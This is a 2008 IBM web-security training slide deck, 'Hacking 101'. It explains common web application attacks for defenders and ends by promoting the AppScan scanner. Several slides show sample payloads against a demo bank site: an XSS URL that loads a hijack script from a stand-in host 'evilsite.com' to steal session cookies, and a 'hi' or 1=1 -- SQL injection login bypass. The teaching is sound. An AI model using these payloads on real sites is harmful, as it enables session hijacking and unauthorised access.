IBM Software Group

Hacking 101
January 22, 2008

An IBM Proof of Technology

© 2007 IBM Corporation

 IBM Software Group

Security Landscape

An IBM Proof of Technology

© 2007 IBM Corporation

 TechWorks

Objective
● Understand the web application environment
● Understand and differentiate between network and application level vulnerabilities
● Understand where the vulnerabilities exist

© 2007 IBM Corporation 3

 TechWorks

High Level Web Application Architecture

Desktop Transport Network Web Applications

Antivirus Encryption Firewalls /

Protection (SSL) Advanced
Routers

Web Backend
Firewall
Application Server

Databases
Web Servers

© 2007 IBM Corporation 4

 TechWorks

Network Defenses for Web Applications

Perimeter IDS IPS App Firewall

Firewall Intrusion Intrusion Application

Detection Prevention Firewall
System System

System Incident Event Management (SIEM)

© 2007 IBM Corporation 5

 TechWorks

The Myth: “Our Site Is Safe”

We Have Firewalls
in Place We Audit It Once a
Quarter with Pen Testers

We Use Network
Vulnerability Scanners

© 2007 IBM Corporation 6

 TechWorks

The Reality: Security and Spending Are Unbalanced

Security Spending

% of Attacks % of Dollars

Web 10%
Applications

75% 90%

Network
Server
25%

75% of all attacks on Information Security are directed to

the Web Application Layer.

2/3 of All Web Applications Are Vulnerable

Sources: Gartner, Watchfire

© 2007 IBM Corporation 7

 TechWorks

WASC – Threat Classifications

Application Threat Attack Types Example Business Impact

Authentication ● Brute Force Attacks that target a web site’s method of validating the
● Insufficient Authentication identity of a user, service or application.

● Weak Password Recovery Validation

Authorization ● Credential/Session Prediction
● Insufficient Authorization
● Insufficient Session Expiration
● Session Fixation
Attacks that target a web site’s method of determining if a
user, service or application has the necessary permissions
to perform a requested action.

Client-side Attacks ● Content Spoofing The abuse or exploitation of a web site’s users (breaching
● Cross Site Scripting trust relationships between a user and a web site).

Command Execution ● Buffer Overflow Attacks designed to execute remote commands on the web
● Format String Attack site by manipulating user-supplied input fields.

● LDAP Injection
● OS Commanding
● SQL Injection
● SSI Injection
● XPath Injection

© 2007 IBM Corporation 8

 TechWorks
WASC – Threat Classifications
Application Threat Attack Types
Information Disclosure ● Directory Indexing
● Information Leakage
● Path Traversal
● Predictable Resource Location
Logical Attacks ● Abuse of Functionality
● Denial of Service
● Insufficient Anti-automation
● Insufficient Process Validation
© 2007 IBM Corporation
Example Business Impact
Attacks designed to acquire system specific information
about a web site. This includes software distribution, version
numbers, patch levels, and also secure file locations.
The abuse or exploitation of a web application logic flow
(password recovery, account registration, auction bidding
and eCommerce purchasing are examples of application
logic).
9
 IBM Software Group

Let’s See Some Examples …

An IBM Proof of Technology

© 2007 IBM Corporation

 TechWorks

Parameter Tampering
● What is it?
 Parameters are used to obtain information from the client.
 This information can be changed in a site’s URL parameter
● Why does parameter tampering exist?
 Developers focus on the legal values of parameters and how they should be utilized.
 Little if any attention is given to the incorrect values
● Business Impact
 The application can perform a function that was not intended by its developer like giving
access to customer information.

© 2007 IBM Corporation 11

 TechWorks

Parameter Tampering

© 2007 IBM Corporation 12

 TechWorks

Why not wildcard the parameter?

© 2007 IBM Corporation 13

 TechWorks

Brute Force
● What is it?
 Automated process of trial and error methods used to guess a persons username, password,
credit-card number or cryptographic keys. Also called Parameter Tampering.
● Why do Brute Force attacks exist?
 Weak passwords and encryption techniques
ƒ Easy to guess, dictionary based
 No account lockout
ƒ Site doesn’t lockout a user after 3 invalid login attempts
● Business Impact
 It may be possible to escalate user privileges and gain administrative permissions over the
web application
 Confidential information disclosure
 Financial risk

© 2007 IBM Corporation 14

 TechWorks

Brute Force – Automated ‘Guessing’ Game

© 2007 IBM Corporation 15

 TechWorks

Brute Force Tools are Easy to Find …

© 2007 IBM Corporation 16

 TechWorks

The Same is True with Dictionary Lists …

© 2007 IBM Corporation 17

 TechWorks

Brute Force – Automated ‘Guessing’ Game

● Data Mining at MySpace.com: published in the [Full Disclosure] mailing list on June
30th 2006
● MySpace.com, an online social networking web site
 Offers its members the ability to send news bulletins to other MySpace members
● When you submit your bulletin a URL is sent to your friends that looks similar to this:
http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.read&messageID=[BID]
[BID] is an automatically generated numeric bulletin ID
● By changing the bulletin ID number, users were able to access the news bulletins of
other MySpace members which they had not received notification about, and read
the contents

© 2007 IBM Corporation 18

 TechWorks

Directory Indexing
● What is it?
 It is possible to view and download the contents of certain web application virtual directories,
which may contain restricted files.
● Why do Insufficient Authentication attacks exist?
 Web-based administration tools
ƒ ‘Hidden’, not linked to main site (easier to setup, but a danger if the admin site is URL
accessible)
 ‘/admin’ directory off of the root
● Business Impact
 Attacker can view confidential files
 Attacker can construct a targeted attack plan for your site
 Directory navigation to restricted areas of the site

© 2007 IBM Corporation 19

 TechWorks

The application’s default page

© 2007 IBM Corporation 20

 TechWorks

Navigation to Sensitive Files

© 2007 IBM Corporation 21

 TechWorks

Credential/Session Prediction
● What is it?
 A method of hijacking or impersonating a web site user
 Also called Cookie Poisoning
● Why do Credential/Session Prediction attacks exist?
 Session IDs stored as cookies, hidden-fields or URL values
 An attacker will try to determine the algorithm used to generate the ID and try to impersonate
the current user or the next session ID
● Business Impact
 User impersonation
 Fraudulent access and use of a user’s (or many user’s) information/account/confidential
details

© 2007 IBM Corporation 22

 TechWorks

Cookie Poisoning – When cookies are bad

© 2007 IBM Corporation 23

 TechWorks

Why not try to modify the cookie values?

© 2007 IBM Corporation 24

 TechWorks

Change cookie value? Change user .. Not good!!

© 2007 IBM Corporation 25

 TechWorks

Application Buffer Overflow

● What is it?
 The amount of unvalidated data sent in the request is more then the application was
designed to handle.
● Why do application buffer overflows exist?
 Time
 Application components expect other components to provide data validation checks.
 The user is allowed to modify the data controls.
● Business Impact
 It is possible to execute remote commands on the web server. This usually means complete
compromise of the server and its contents
 It is possible to prevent the web application from serving other users (denial of service)

© 2007 IBM Corporation 26

 TechWorks

Buffer Overflows – Still around after all these years

© 2007 IBM Corporation 27

 TechWorks

Application asks the browser to enforce data validation

<INPUT size=“25" name="subject" value="" />

© 2007 IBM Corporation 28

 TechWorks

Users can bypass browser controls

<INPUT size=“10000" name="subject" value="" />

© 2007 IBM Corporation 29

 TechWorks

In this case causing a server crash

© 2007 IBM Corporation 30

 TechWorks

Cross Site Scripting

● What is it?
 The user provides unvalidated data in a request that is echoed to the user as part of the
response.
 The unvalidated data contains a script that is executed in the context of the user’s browser
session.
● Why does Cross Site Scripting happen?
 User input is used to build/customize/personalize the response. The application does not
anticipate the data will be executed in the user’s browser context.
● Business Impact
 “Virtual hijacking” of the session.
 Any information flowing between the legitimate user and site can be manipulated or
transmitted to a 3rd party.
● We will cover this in more detail during the Hands-On portion, but check this out….

© 2007 IBM Corporation 31

 TechWorks

Attacking users via Cross Site Scripting (XSS)

© 2007 IBM Corporation 32

 TechWorks

User sends the site more than they think

http://www.altoromutual.com/altoro/search.aspx?txtSearch=%3Cscript+src%3D%22http%3A%2F%2Fwww.e
vilsite.com%2Fxss%2Fhijack.js%22%3E%3C%2Fscript%3E

© 2007 IBM Corporation 33

 TechWorks

Cross Site Scripting – The Process

Bad Guy

5) Bad guy uses stolen

1) Link to bank.com session information to
sent to user via impersonate user
E-mail or HTTP
4) Script sends user’s
cookie and session
information without the user’s
consent or knowledge
bank.com
User
2) User sends script embedded as data

3) Script/data returned, executed by browser

© 2007 IBM Corporation 34

 TechWorks

SQL Injection
● What is it?
 An attacker injects malicious characters (SQL syntax) into web application parameters in an
attempt to change the original syntax of the query.
● Why does SQL Injection exist?
 Sanitization of hazardous characters was not performed correctly on user input.
● Business Impact
 It is possible to view, modify or delete database entries and tables.
 It is possible to alter the original query in order to bypass normal authentication mechanisms.

© 2007 IBM Corporation 35

 TechWorks

SQL Injection

Username: jsmith
Password: demo1234

© 2007 IBM Corporation 36

 TechWorks

Normal login for JSMITH

© 2007 IBM Corporation 37

 TechWorks

The start of a SQL injection attack

Username: ‘
Password: a
Need password to bypass
client-side validation.

© 2007 IBM Corporation 38

 TechWorks

Step 1 – We have an error

© 2007 IBM Corporation 39

 TechWorks

Step 2 – Try a more complete SQL statement

Username: hi’ or 1=1 --

Password: a
Need password to bypass
client-side validation.

© 2007 IBM Corporation 40

 TechWorks

Now we are Admin, without a username and password!

© 2007 IBM Corporation 41

 TechWorks

Automated Tools

Automated Scanning Tools

AppScan

© 2007 IBM Corporation 42

 TechWorks

Q&A

Questions?

© 2007 IBM Corporation 43

 TechWorks

Resources
● Download AppScan 7.6 - http://www.watchfire.com
● Latest whitepapers visit: http://www.watchfire.com/news/whitepapers.aspx
● Visit Watchfire at one of our upcoming shows
http://www.watchfire.com/news/events.aspx
● Register for upcoming web seminars visit
http://www.watchfire.com/news/seminars.aspx
● Contact us at sales@watchfire.com

© 2007 IBM Corporation 44

 IBM Software Group

Thank-you for joining us today!

An IBM Proof of Technology

© 2007 IBM Corporation